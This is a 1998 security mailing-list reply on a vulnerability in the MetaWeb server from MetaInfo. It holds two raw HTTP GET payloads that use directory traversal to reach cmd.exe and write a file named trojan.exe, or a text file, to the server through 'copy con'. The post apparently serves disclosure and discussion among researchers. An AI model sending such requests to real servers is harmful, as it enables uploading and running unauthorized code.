Re: Security vulnerabilities in MetaInfo products

From: pedwardat_private
Date: Tue Jun 30 1998 - 13:18:02 PDT

    > The MetaWeb server allows the running of NT batch/CMD files (this is how
    > some
    > of the Sendmail remote configuring works); if an attacker was to upload
    > or produce a standard NT batch file, he could run any program he wishes.
    >

    > -Jeff Forristal

    Ya know, the days of old where we had to use the COPY command to edit
    the autoexec.bat come to mind:

    An application that uses the following command could potentially upload a
    binary to an NT server and run it:

    GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0

    Or if you want to create a text file:

    GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0

    and terminate with a ^Z

    Theoretically the commands above should work for the sendmail case that
    Jeff explained.

    --Perry

    --
    Perry Harrington        System Software Engineer    zelur xuniL  ()
    http://www.webcom.com  perry.harringtonat_private  Think Blue.  /\